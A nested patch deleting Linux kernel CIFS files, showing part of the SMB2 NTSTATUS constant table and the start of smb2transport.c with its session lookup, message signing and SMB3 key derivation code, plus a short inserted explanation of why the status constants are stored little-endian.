+-#define STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS cpu_to_le32(0xC01E058D)
+-#define STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED cpu_to_le32(0xC01E05E0)
+-#define STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME cpu_to_le32(0xC01E05E1)
+-#define STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP cpu_to_le32(0xC01E05E2)
+-#define STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E05E3)
+-#define STATUS_GRAPHICS_INVALID_POINTER cpu_to_le32(0xC01E05E4)
+-#define STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE cpu_to_le32(0xC01E05E5)
+-#define STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E05E6)
+-#define STATUS_GRAPHICS_INTERNAL_ERROR cpu_to_le32(0xC01E05E7)
+-#define STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E05E8)
+-#define STATUS_FVE_LOCKED_VOLUME cpu_to_le32(0xC0210000)
+-#define STATUS_FVE_NOT_ENCRYPTED cpu_to_le32(0xC0210001)
+-#define STATUS_FVE_BAD_INFORMATION cpu_to_le32(0xC0210002)
+-#define STATUS_FVE_TOO_SMALL cpu_to_le32(0xC0210003)
+-#define STATUS_FVE_FAILED_WRONG_FS cpu_to_le32(0xC0210004)
+-#define STATUS_FVE_FAILED_BAD_FS cpu_to_le32(0xC0210005)
+-#define STATUS_FVE_FS_NOT_EXTENDED cpu_to_le32(0xC0210006)
+-#define STATUS_FVE_FS_MOUNTED cpu_to_le32(0xC0210007)
+-#define STATUS_FVE_NO_LICENSE cpu_to_le32(0xC0210008)
+-#define STATUS_FVE_ACTION_NOT_ALLOWED cpu_to_le32(0xC0210009)
+-#define STATUS_FVE_BAD_DATA cpu_to_le32(0xC021000A)
+-#define STATUS_FVE_VOLUME_NOT_BOUND cpu_to_le32(0xC021000B)
+-#define STATUS_FVE_NOT_DATA_VOLUME cpu_to_le32(0xC021000C)
+-#define STATUS_FVE_CONV_READ_ERROR cpu_to_le32(0xC021000D)
+-#define STATUS_FVE_CONV_WRITE_ERROR cpu_to_le32(0xC021000E)
+-#define STATUS_FVE_OVERLAPPED_UPDATE cpu_to_le32(0xC021000F)
+-#define STATUS_FVE_FAILED_SECTOR_SIZE cpu_to_le32(0xC0210010)
+-#define STATUS_FVE_FAILED_AUTHENTICATION cpu_to_le32(0xC0210011)
+-#define STATUS_FVE_NOT_OS_VOLUME cpu_to_le32(0xC0210012)
+-#define STATUS_FVE_KEYFILE_NOT_FOUND cpu_to_le32(0xC0210013)
+-#define STATUS_FVE_KEYFILE_INVALID cpu_to_le32(0xC0210014)
+-#define STATUS_FVE_KEYFILE_NO_VMK cpu_to_le32(0xC0210015)
+-#define STATUS_FVE_TPM_DISABLED cpu_to_le32(0xC0210016)
+-#define STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO cpu_to_le32(0xC0210017)
+-#define STATUS_FVE_TPM_INVALID_PCR cpu_to_le32(0xC0210018)
+-#define STATUS_FVE_TPM_NO_VMK cpu_to_le32(0xC0210019)
+-#define STATUS_FVE_PIN_INVALID cpu_to_le32(0xC021001A)
+-#define STATUS_FVE_AUTH_INVALID_APPLICATION cpu_to_le32(0xC021001B)
+-#define STATUS_FVE_AUTH_INVALID_CONFIG cpu_to_le32(0xC021001C)
+-#define STATUS_FVE_DEBUGGER_ENABLED cpu_to_le32(0xC021001D)
+-#define STATUS_FVE_DRY_RUN_FAILED cpu_to_le32(0xC021001E)
+-#define STATUS_FVE_BAD_METADATA_POINTER cpu_to_le32(0xC021001F)
+-#define STATUS_FVE_OLD_METADATA_COPY cpu_to_le32(0xC0210020)
+-#define STATUS_FVE_REBOOT_REQUIRED cpu_to_le32(0xC0210021)
+-#define STATUS_FVE_RAW_ACCESS cpu_to_le32(0xC0210022)
+-#define STATUS_FVE_RAW_BLOCKED cpu_to_le32(0xC0210023)
+-#define STATUS_FWP_CALLOUT_NOT_FOUND cpu_to_le32(0xC0220001)
+-#define STATUS_FWP_CONDITION_NOT_FOUND cpu_to_le32(0xC0220002)
+-#define STATUS_FWP_FILTER_NOT_FOUND cpu_to_le32(0xC0220003)
+-#define STATUS_FWP_LAYER_NOT_FOUND cpu_to_le32(0xC0220004)
+-#define STATUS_FWP_PROVIDER_NOT_FOUND cpu_to_le32(0xC0220005)
+-#define STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND cpu_to_le32(0xC0220006)
+-#define STATUS_FWP_SUBLAYER_NOT_FOUND cpu_to_le32(0xC0220007)
+-#define STATUS_FWP_NOT_FOUND cpu_to_le32(0xC0220008)
+-#define STATUS_FWP_ALREADY_EXISTS cpu_to_le32(0xC0220009)
+-#define STATUS_FWP_IN_USE cpu_to_le32(0xC022000A)
+-#define STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS cpu_to_le32(0xC022000B)
+-#define STATUS_FWP_WRONG_SESSION cpu_to_le32(0xC022000C)
+-#define STATUS_FWP_NO_TXN_IN_PROGRESS cpu_to_le32(0xC022000D)
+-#define STATUS_FWP_TXN_IN_PROGRESS cpu_to_le32(0xC022000E)
+-#define STATUS_FWP_TXN_ABORTED cpu_to_le32(0xC022000F)
+-#define STATUS_FWP_SESSION_ABORTED cpu_to_le32(0xC0220010)
+-#define STATUS_FWP_INCOMPATIBLE_TXN cpu_to_le32(0xC0220011)
+-#define STATUS_FWP_TIMEOUT cpu_to_le32(0xC0220012)
+-#define STATUS_FWP_NET_EVENTS_DISABLED cpu_to_le32(0xC0220013)
+-#define STATUS_FWP_INCOMPATIBLE_LAYER cpu_to_le32(0xC0220014)
+-#define STATUS_FWP_KM_CLIENTS_ONLY cpu_to_le32(0xC0220015)
+-#define STATUS_FWP_LIFETIME_MISMATCH cpu_to_le32(0xC0220016)
+-#define STATUS_FWP_BUILTIN_OBJECT cpu_to_le32(0xC0220017)
+-#define STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS cpu_to_le32(0xC0220018)
+-#define STATUS_FWP_TOO_MANY_CALLOUTS cpu_to_le32(0xC0220018)
+-#define STATUS_FWP_NOTIFICATION_DROPPED cpu_to_le32(0xC0220019)
+-#define STATUS_FWP_TRAFFIC_MISMATCH cpu_to_le32(0xC022001A)
+-#define STATUS_FWP_INCOMPATIBLE_SA_STATE cpu_to_le32(0xC022001B)
+-#define STATUS_FWP_NULL_POINTER cpu_to_le32(0xC022001C)
+-#define STATUS_FWP_INVALID_ENUMERATOR cpu_to_le32(0xC022001D)
+-#define STATUS_FWP_INVALID_FLAGS cpu_to_le32(0xC022001E)
+-#define STATUS_FWP_INVALID_NET_MASK cpu_to_le32(0xC022001F)
+-#define STATUS_FWP_INVALID_RANGE cpu_to_le32(0xC0220020)
+-#define STATUS_FWP_INVALID_INTERVAL cpu_to_le32(0xC0220021)
+-#define STATUS_FWP_ZERO_LENGTH_ARRAY cpu_to_le32(0xC0220022)
+-#define STATUS_FWP_NULL_DISPLAY_NAME cpu_to_le32(0xC0220023)
+-#define STATUS_FWP_INVALID_ACTION_TYPE cpu_to_le32(0xC0220024)
+-#define STATUS_FWP_INVALID_WEIGHT cpu_to_le32(0xC0220025)
+-#define STATUS_FWP_MATCH_TYPE_MISMATCH cpu_to_le32(0xC0220026)
+-#define STATUS_FWP_TYPE_MISMATCH cpu_to_le32(0xC0220027)
+-#define STATUS_FWP_OUT_OF_BOUNDS cpu_to_le32(0xC0220028)
+-#define STATUS_FWP_RESERVED cpu_to_le32(0xC0220029)
+-#define STATUS_FWP_DUPLICATE_CONDITION cpu_to_le32(0xC022002A)
+-#define STATUS_FWP_DUPLICATE_KEYMOD cpu_to_le32(0xC022002B)
+-#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002C)
+-#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER cpu_to_le32(0xC022002D)
+-#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002E)
+-#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT cpu_to_le32(0xC022002F)
+-#define STATUS_FWP_INCOMPATIBLE_AUTH_METHOD cpu_to_le32(0xC0220030)
+-#define STATUS_FWP_INCOMPATIBLE_DH_GROUP cpu_to_le32(0xC0220031)
+-#define STATUS_FWP_EM_NOT_SUPPORTED cpu_to_le32(0xC0220032)
+-#define STATUS_FWP_NEVER_MATCH cpu_to_le32(0xC0220033)
+-#define STATUS_FWP_PROVIDER_CONTEXT_MISMATCH cpu_to_le32(0xC0220034)
+-#define STATUS_FWP_INVALID_PARAMETER cpu_to_le32(0xC0220035)
+-#define STATUS_FWP_TOO_MANY_SUBLAYERS cpu_to_le32(0xC0220036)
+-#define STATUS_FWP_CALLOUT_NOTIFICATION_FAILED cpu_to_le32(0xC0220037)
+-#define STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG cpu_to_le32(0xC0220038)
+-#define STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG cpu_to_le32(0xC0220039)
+-#define STATUS_FWP_TCPIP_NOT_READY cpu_to_le32(0xC0220100)
+-#define STATUS_FWP_INJECT_HANDLE_CLOSING cpu_to_le32(0xC0220101)
+-#define STATUS_FWP_INJECT_HANDLE_STALE cpu_to_le32(0xC0220102)
+-#define STATUS_FWP_CANNOT_PEND cpu_to_le32(0xC0220103)
+-#define STATUS_NDIS_CLOSING cpu_to_le32(0xC0230002)
+-#define STATUS_NDIS_BAD_VERSION cpu_to_le32(0xC0230004)
+-#define STATUS_NDIS_BAD_CHARACTERISTICS cpu_to_le32(0xC0230005)
+-#define STATUS_NDIS_ADAPTER_NOT_FOUND cpu_to_le32(0xC0230006)
+-#define STATUS_NDIS_OPEN_FAILED cpu_to_le32(0xC0230007)
+-#define STATUS_NDIS_DEVICE_FAILED cpu_to_le32(0xC0230008)
+-#define STATUS_NDIS_MULTICAST_FULL cpu_to_le32(0xC0230009)
+-#define STATUS_NDIS_MULTICAST_EXISTS cpu_to_le32(0xC023000A)
+-#define STATUS_NDIS_MULTICAST_NOT_FOUND cpu_to_le32(0xC023000B)
+-#define STATUS_NDIS_REQUEST_ABORTED cpu_to_le32(0xC023000C)
+-#define STATUS_NDIS_RESET_IN_PROGRESS cpu_to_le32(0xC023000D)
+-#define STATUS_NDIS_INVALID_PACKET cpu_to_le32(0xC023000F)
+-#define STATUS_NDIS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0230010)
+-#define STATUS_NDIS_ADAPTER_NOT_READY cpu_to_le32(0xC0230011)
+-#define STATUS_NDIS_INVALID_LENGTH cpu_to_le32(0xC0230014)
+-#define STATUS_NDIS_INVALID_DATA cpu_to_le32(0xC0230015)
+-#define STATUS_NDIS_BUFFER_TOO_SHORT cpu_to_le32(0xC0230016)
+-#define STATUS_NDIS_INVALID_OID cpu_to_le32(0xC0230017)
+-#define STATUS_NDIS_ADAPTER_REMOVED cpu_to_le32(0xC0230018)
+-#define STATUS_NDIS_UNSUPPORTED_MEDIA cpu_to_le32(0xC0230019)
+-#define STATUS_NDIS_GROUP_ADDRESS_IN_USE cpu_to_le32(0xC023001A)
+-#define STATUS_NDIS_FILE_NOT_FOUND cpu_to_le32(0xC023001B)
+-#define STATUS_NDIS_ERROR_READING_FILE cpu_to_le32(0xC023001C)
+-#define STATUS_NDIS_ALREADY_MAPPED cpu_to_le32(0xC023001D)
+-#define STATUS_NDIS_RESOURCE_CONFLICT cpu_to_le32(0xC023001E)
+-#define STATUS_NDIS_MEDIA_DISCONNECTED cpu_to_le32(0xC023001F)
+-#define STATUS_NDIS_INVALID_ADDRESS cpu_to_le32(0xC0230022)
+-#define STATUS_NDIS_PAUSED cpu_to_le32(0xC023002A)
+-#define STATUS_NDIS_INTERFACE_NOT_FOUND cpu_to_le32(0xC023002B)
+-#define STATUS_NDIS_UNSUPPORTED_REVISION cpu_to_le32(0xC023002C)
+-#define STATUS_NDIS_INVALID_PORT cpu_to_le32(0xC023002D)
+-#define STATUS_NDIS_INVALID_PORT_STATE cpu_to_le32(0xC023002E)
+-#define STATUS_NDIS_LOW_POWER_STATE cpu_to_le32(0xC023002F)
+-#define STATUS_NDIS_NOT_SUPPORTED cpu_to_le32(0xC02300BB)
+-#define STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED cpu_to_le32(0xC0232000)
+-#define STATUS_NDIS_DOT11_MEDIA_IN_USE cpu_to_le32(0xC0232001)
+-#define STATUS_NDIS_DOT11_POWER_STATE_INVALID cpu_to_le32(0xC0232002)
+-#define STATUS_IPSEC_BAD_SPI cpu_to_le32(0xC0360001)
+-#define STATUS_IPSEC_SA_LIFETIME_EXPIRED cpu_to_le32(0xC0360002)
+-#define STATUS_IPSEC_WRONG_SA cpu_to_le32(0xC0360003)
+-#define STATUS_IPSEC_REPLAY_CHECK_FAILED cpu_to_le32(0xC0360004)
+-#define STATUS_IPSEC_INVALID_PACKET cpu_to_le32(0xC0360005)
+-#define STATUS_IPSEC_INTEGRITY_CHECK_FAILED cpu_to_le32(0xC0360006)
+-#define STATUS_IPSEC_CLEAR_TEXT_DROP cpu_to_le32(0xC0360007)
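
(Editor's sketch, not part of the patch: the table deleted above is the client's NTSTATUS map, by its content evidently fs/cifs/smb2status.h; the removal of fs/cifs/smb2transport.c follows below in the same style. Every constant is wrapped in cpu_to_le32() because SMB2 carries NTSTATUS codes little-endian on the wire, so storing the constants pre-swapped lets the client compare them directly against the raw Status field of a response header with no byte swap at each check. A minimal user-space C illustration of that idea follows; to_le32() is a stand-in for the kernel's cpu_to_le32() and the whole example is hypothetical.)

	#include <stdint.h>
	#include <stdio.h>

	/* stand-in for the kernel's cpu_to_le32(): identity on a
	 * little-endian host, byte swap on a big-endian one */
	static uint32_t to_le32(uint32_t v)
	{
		const union { uint16_t u; uint8_t b[2]; } probe = { .u = 1 };

		if (probe.b[0])
			return v;
		return (v >> 24) | ((v >> 8) & 0x0000ff00) |
		       ((v << 8) & 0x00ff0000) | (v << 24);
	}

	int main(void)
	{
		/* constant kept pre-swapped, as in the deleted header */
		const uint32_t STATUS_FWP_TIMEOUT = to_le32(0xC0220012);
		/* Status field as read straight out of a wire buffer */
		uint32_t wire_status = to_le32(0xC0220012);

		if (wire_status == STATUS_FWP_TIMEOUT)
			printf("server reported STATUS_FWP_TIMEOUT\n");
		return 0;
	}
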
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+deleted file mode 100644
+index 790acf65a0926..0000000000000
+--- a/fs/cifs/smb2transport.c
++++ /dev/null
+@@ -1,934 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002, 2011
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Jeremy Allison (jra@samba.org) 2006
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/list.h>
+-#include <linux/wait.h>
+-#include <linux/net.h>
+-#include <linux/delay.h>
+-#include <linux/uaccess.h>
+-#include <asm/processor.h>
+-#include <linux/mempool.h>
+-#include <linux/highmem.h>
+-#include <crypto/aead.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_debug.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-
+-static int
+-smb3_crypto_shash_allocate(struct TCP_Server_Info *server)
+-{
+-	struct cifs_secmech *p = &server->secmech;
+-	int rc;
+-
+-	rc = cifs_alloc_hash("hmac(sha256)", &p->hmacsha256);
+-	if (rc)
+-		goto err;
+-
+-	rc = cifs_alloc_hash("cmac(aes)", &p->aes_cmac);
+-	if (rc)
+-		goto err;
+-
+-	return 0;
+-err:
+-	cifs_free_hash(&p->hmacsha256);
+-	return rc;
+-}
+-
+-int
+-smb311_crypto_shash_allocate(struct TCP_Server_Info *server)
+-{
+-	struct cifs_secmech *p = &server->secmech;
+-	int rc = 0;
+-
+-	rc = cifs_alloc_hash("hmac(sha256)", &p->hmacsha256);
+-	if (rc)
+-		return rc;
+-
+-	rc = cifs_alloc_hash("cmac(aes)", &p->aes_cmac);
+-	if (rc)
+-		goto err;
+-
+-	rc = cifs_alloc_hash("sha512", &p->sha512);
+-	if (rc)
+-		goto err;
+-
+-	return 0;
+-
+-err:
+-	cifs_free_hash(&p->aes_cmac);
+-	cifs_free_hash(&p->hmacsha256);
+-	return rc;
+-}
+-
+-
+-static
+-int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+-{
+-	struct cifs_chan *chan;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses = NULL;
+-	int i;
+-	int rc = 0;
+-	bool is_binding = false;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		if (ses->Suid == ses_id)
+-			goto found;
+-	}
+-	cifs_server_dbg(VFS, "%s: Could not find session 0x%llx\n",
+-			__func__, ses_id);
+-	rc = -ENOENT;
+-	goto out;
+-
+-found:
+-	spin_lock(&ses->ses_lock);
+-	spin_lock(&ses->chan_lock);
+-
+-	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
+-		      ses->ses_status == SES_GOOD);
+-	if (is_binding) {
+-		/*
+-		 * If we are in the process of binding a new channel
+-		 * to an existing session, use the master connection
+-		 * session key
+-		 */
+-		memcpy(key, ses->smb3signingkey, SMB3_SIGN_KEY_SIZE);
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-		goto out;
+-	}
+-
+-	/*
+-	 * Otherwise, use the channel key.
+-	 */
+-
+-	for (i = 0; i < ses->chan_count; i++) {
+-		chan = ses->chans + i;
+-		if (chan->server == server) {
+-			memcpy(key, chan->signkey, SMB3_SIGN_KEY_SIZE);
+-			spin_unlock(&ses->chan_lock);
+-			spin_unlock(&ses->ses_lock);
+-			goto out;
+-		}
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	spin_unlock(&ses->ses_lock);
+-
+-	cifs_dbg(VFS,
+-		 "%s: Could not find channel signing key for session 0x%llx\n",
+-		 __func__, ses_id);
+-	rc = -ENOENT;
+-
+-out:
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	return rc;
+-}
+-
+-static struct cifs_ses *
+-smb2_find_smb_ses_unlocked(struct TCP_Server_Info *server, __u64 ses_id)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		if (ses->Suid != ses_id)
+-			continue;
+-		++ses->ses_count;
+-		return ses;
+-	}
+-
+-	return NULL;
+-}
+-
+-struct cifs_ses *
+-smb2_find_smb_ses(struct TCP_Server_Info *server, __u64 ses_id)
+-{
+-	struct cifs_ses *ses;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	ses = smb2_find_smb_ses_unlocked(server, ses_id);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	return ses;
+-}
+-
+-static struct cifs_tcon *
+-smb2_find_smb_sess_tcon_unlocked(struct cifs_ses *ses, __u32  tid)
+-{
+-	struct cifs_tcon *tcon;
+-
+-	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-		if (tcon->tid != tid)
+-			continue;
+-		++tcon->tc_count;
+-		return tcon;
+-	}
+-
+-	return NULL;
+-}
+-
+-/*
+- * Obtain tcon corresponding to the tid in the given
+- * cifs_ses
+- */
+-
+-struct cifs_tcon *
+-smb2_find_smb_tcon(struct TCP_Server_Info *server, __u64 ses_id, __u32  tid)
+-{
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	ses = smb2_find_smb_ses_unlocked(server, ses_id);
+-	if (!ses) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return NULL;
+-	}
+-	tcon = smb2_find_smb_sess_tcon_unlocked(ses, tid);
+-	if (!tcon) {
+-		cifs_put_smb_ses(ses);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return NULL;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	/* tcon already has a ref to ses, so we don't need ses anymore */
+-	cifs_put_smb_ses(ses);
+-
+-	return tcon;
+-}
+-
+-int
+-smb2_calc_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server,
+-			bool allocate_crypto)
+-{
+-	int rc;
+-	unsigned char smb2_signature[SMB2_HMACSHA256_SIZE];
+-	unsigned char *sigptr = smb2_signature;
+-	struct kvec *iov = rqst->rq_iov;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)iov[0].iov_base;
+-	struct cifs_ses *ses;
+-	struct shash_desc *shash = NULL;
+-	struct smb_rqst drqst;
+-
+-	ses = smb2_find_smb_ses(server, le64_to_cpu(shdr->SessionId));
+-	if (unlikely(!ses)) {
+-		cifs_server_dbg(VFS, "%s: Could not find session\n", __func__);
+-		return -ENOENT;
+-	}
+-
+-	memset(smb2_signature, 0x0, SMB2_HMACSHA256_SIZE);
+-	memset(shdr->Signature, 0x0, SMB2_SIGNATURE_SIZE);
+-
+-	if (allocate_crypto) {
+-		rc = cifs_alloc_hash("hmac(sha256)", &shash);
+-		if (rc) {
+-			cifs_server_dbg(VFS,
+-					"%s: sha256 alloc failed\n", __func__);
+-			goto out;
+-		}
+-	} else {
+-		shash = server->secmech.hmacsha256;
+-	}
+-
+-	rc = crypto_shash_setkey(shash->tfm, ses->auth_key.response,
+-			SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc) {
+-		cifs_server_dbg(VFS,
+-				"%s: Could not update with response\n",
+-				__func__);
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_init(shash);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not init sha256", __func__);
+-		goto out;
+-	}
+-
+-	/*
+-	 * For SMB2+, __cifs_calc_signature() expects to sign only the actual
+-	 * data, that is, iov[0] should not contain a rfc1002 length.
+-	 *
+-	 * Sign the rfc1002 length prior to passing the data (iov[1-N]) down to
+-	 * __cifs_calc_signature().
+-	 */
+-	drqst = *rqst;
+-	if (drqst.rq_nvec >= 2 && iov[0].iov_len == 4) {
+-		rc = crypto_shash_update(shash, iov[0].iov_base,
+-					 iov[0].iov_len);
+-		if (rc) {
+-			cifs_server_dbg(VFS,
+-					"%s: Could not update with payload\n",
+-					__func__);
+-			goto out;
+-		}
+-		drqst.rq_iov++;
+-		drqst.rq_nvec--;
+-	}
+-
+-	rc = __cifs_calc_signature(&drqst, server, sigptr, shash);
+-	if (!rc)
+-		memcpy(shdr->Signature, sigptr, SMB2_SIGNATURE_SIZE);
+-
+-out:
+-	if (allocate_crypto)
+-		cifs_free_hash(&shash);
+-	if (ses)
+-		cifs_put_smb_ses(ses);
+-	return rc;
+-}
+-
+-static int generate_key(struct cifs_ses *ses, struct kvec label,
+-			struct kvec context, __u8 *key, unsigned int key_size)
+-{
+-	unsigned char zero = 0x0;
+-	__u8 i[4] = {0, 0, 0, 1};
+-	__u8 L128[4] = {0, 0, 0, 128};
+-	__u8 L256[4] = {0, 0, 1, 0};
+-	int rc = 0;
+-	unsigned char prfhash[SMB2_HMACSHA256_SIZE];
+-	unsigned char *hashptr = prfhash;
+-	struct TCP_Server_Info *server = ses->server;
+-
+-	memset(prfhash, 0x0, SMB2_HMACSHA256_SIZE);
+-	memset(key, 0x0, key_size);
+-
+-	rc = smb3_crypto_shash_allocate(server);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: crypto alloc failed\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_setkey(server->secmech.hmacsha256->tfm,
+-		ses->auth_key.response, SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not set with session key\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_init(server->secmech.hmacsha256);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not init sign hmac\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.hmacsha256, i, 4);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with n\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.hmacsha256, label.iov_base, label.iov_len);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with label\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.hmacsha256, &zero, 1);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with zero\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.hmacsha256, context.iov_base, context.iov_len);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with context\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
+-		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM)) {
+-		rc = crypto_shash_update(server->secmech.hmacsha256, L256, 4);
+-	} else {
+-		rc = crypto_shash_update(server->secmech.hmacsha256, L128, 4);
+-	}
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with L\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_final(server->secmech.hmacsha256, hashptr);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not generate sha256 hash\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	memcpy(key, hashptr, key_size);
+-
+-smb3signkey_ret:
+-	return rc;
+-}
+-
+-struct derivation {
+-	struct kvec label;
+-	struct kvec context;
+-};
+-
+-struct derivation_triplet {
+-	struct derivation signing;
+-	struct derivation encryption;
+-	struct derivation decryption;
+-};
+-
+-static int
+-generate_smb3signingkey(struct cifs_ses *ses,
+-			struct TCP_Server_Info *server,
+-			const struct derivation_triplet *ptriplet)
+-{
+-	int rc;
+-	bool is_binding = false;
+-	int chan_index = 0;
+-
+-	spin_lock(&ses->ses_lock);
+-	spin_lock(&ses->chan_lock);
+-	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
+-		      ses->ses_status == SES_GOOD);
+-
+-	chan_index = cifs_ses_get_chan_index(ses, server);
+-	/* TODO: introduce ref counting for channels when the can be freed */
+-	spin_unlock(&ses->chan_lock);
+-	spin_unlock(&ses->ses_lock);
+-
+-	/*
+-	 * All channels use the same encryption/decryption keys but
+-	 * they have their own signing key.
+-	 *
+-	 * When we generate the keys, check if it is for a new channel
+-	 * (binding) in which case we only need to generate a signing
+-	 * key and store it in the channel as to not overwrite the
+-	 * master connection signing key stored in the session
+-	 */
+-
+-	if (is_binding) {
+-		rc = generate_key(ses, ptriplet->signing.label,
+-				  ptriplet->signing.context,
+-				  ses->chans[chan_index].signkey,
+-				  SMB3_SIGN_KEY_SIZE);
+-		if (rc)
+-			return rc;
+-	} else {
+-		rc = generate_key(ses, ptriplet->signing.label,
+-				  ptriplet->signing.context,
+-				  ses->smb3signingkey,
+-				  SMB3_SIGN_KEY_SIZE);
+-		if (rc)
+-			return rc;
+-
+-		/* safe to access primary channel, since it will never go away */
+-		spin_lock(&ses->chan_lock);
+-		memcpy(ses->chans[chan_index].signkey, ses->smb3signingkey,
+-		       SMB3_SIGN_KEY_SIZE);
+-		spin_unlock(&ses->chan_lock);
+-
+-		rc = generate_key(ses, ptriplet->encryption.label,
+-				  ptriplet->encryption.context,
+-				  ses->smb3encryptionkey,
+-				  SMB3_ENC_DEC_KEY_SIZE);
+-		rc = generate_key(ses, ptriplet->decryption.label,
+-				  ptriplet->decryption.context,
+-				  ses->smb3decryptionkey,
+-				  SMB3_ENC_DEC_KEY_SIZE);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if (rc)
+-		return rc;
+-
+-#ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
+-	cifs_dbg(VFS, "%s: dumping generated AES session keys\n", __func__);
+-	/*
+-	 * The session id is opaque in terms of endianness, so we can't
+-	 * print it as a long long. we dump it as we got it on the wire
+-	 */
+-	cifs_dbg(VFS, "Session Id    %*ph\n", (int)sizeof(ses->Suid),
+-			&ses->Suid);
+-	cifs_dbg(VFS, "Cipher type   %d\n", server->cipher_type);
+-	cifs_dbg(VFS, "Session Key   %*ph\n",
+-		 SMB2_NTLMV2_SESSKEY_SIZE, ses->auth_key.response);
+-	cifs_dbg(VFS, "Signing Key   %*ph\n",
+-		 SMB3_SIGN_KEY_SIZE, ses->smb3signingkey);
+-	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
+-		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM)) {
+-		cifs_dbg(VFS, "ServerIn Key  %*ph\n",
+-				SMB3_GCM256_CRYPTKEY_SIZE, ses->smb3encryptionkey);
+-		cifs_dbg(VFS, "ServerOut Key %*ph\n",
+-				SMB3_GCM256_CRYPTKEY_SIZE, ses->smb3decryptionkey);
+-	} else {
+-		cifs_dbg(VFS, "ServerIn Key  %*ph\n",
